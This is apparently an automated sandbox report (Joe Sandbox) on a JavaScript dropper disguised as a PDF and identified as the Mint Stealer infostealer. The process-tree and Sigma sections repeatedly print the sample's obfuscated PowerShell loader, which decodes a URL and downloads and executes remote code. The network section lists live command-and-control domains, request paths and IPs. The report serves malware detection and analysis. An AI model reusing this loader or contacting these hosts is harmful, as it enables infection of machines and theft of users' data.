Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_DRP12938938231_PDF.js

Overview

General Information

Sample name:_DRP12938938231_PDF.js
Analysis ID:1556633
MD5:b05ee915cdbdb359f19b8e42acebaf48
SHA1:f8a4866dd81dde78f6f1a1e11a9594fcbce71612
SHA256:41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Creates processes via WMI
Loading BitLocker PowerShell Module
Obfuscated command line found
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 7552 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • conhost.exe (PID: 7372 cmdline: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1796 cmdline: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1796JoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5108, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 7552, ProcessName: wscript.exe
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5108, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 7552, ProcessName: wscript.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7372, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ProcessId: 1796, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:23:48.092606+010020570631A Network Trojan was detected192.168.11.2049763206.188.196.2580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:23:51.210209+010028566541A Network Trojan was detected192.168.11.2049764206.188.196.3780TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:23:50.224181+010028590031Domain Observed Used for C2 Detected192.168.11.20566191.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://gidcldeaccadneh.topAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: _DRP12938938231_PDF.jsReversingLabs: Detection: 15%
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42F16000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.79921044319.0000016D42C8E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb` source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42EE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79921044319.0000016D42C87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *n.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbm source: powershell.exe, 00000003.00000002.79923029249.0000016D42F2C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb`8 source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Suspicious execution chain found
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2859003 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:56619 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.11.20:49763 -> 206.188.196.25:80
    Source: Network trafficSuricata IDS: 2858291 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49763 -> 206.188.196.25:80
    Source: Network trafficSuricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49764 -> 206.188.196.37:80
    Queries Google from non browser process on port 80
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 206.188.196.37 206.188.196.37
    Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
    Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
    Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: sfibhzu3ubhza.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gidcldeaccadneh.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: sfibhzu3ubhza.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gidcldeaccadneh.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: sfibhzu3ubhza.top
    Source: global trafficDNS traffic detected: DNS query: gidcldeaccadneh.top
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$g31r4qoblma59n7/$ka2f95t10y7xcsp.php?id=$env:computername&key=$fdnjboswy&s=mints21
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top/uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21p
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BEFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BEF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2BF22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C09D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top/1.php?s=mints218
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
    Source: powershell.exe, 00000003.00000002.79921044319.0000016D42C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.w
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comh
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
    Source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B39B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebratin
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2BF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.png
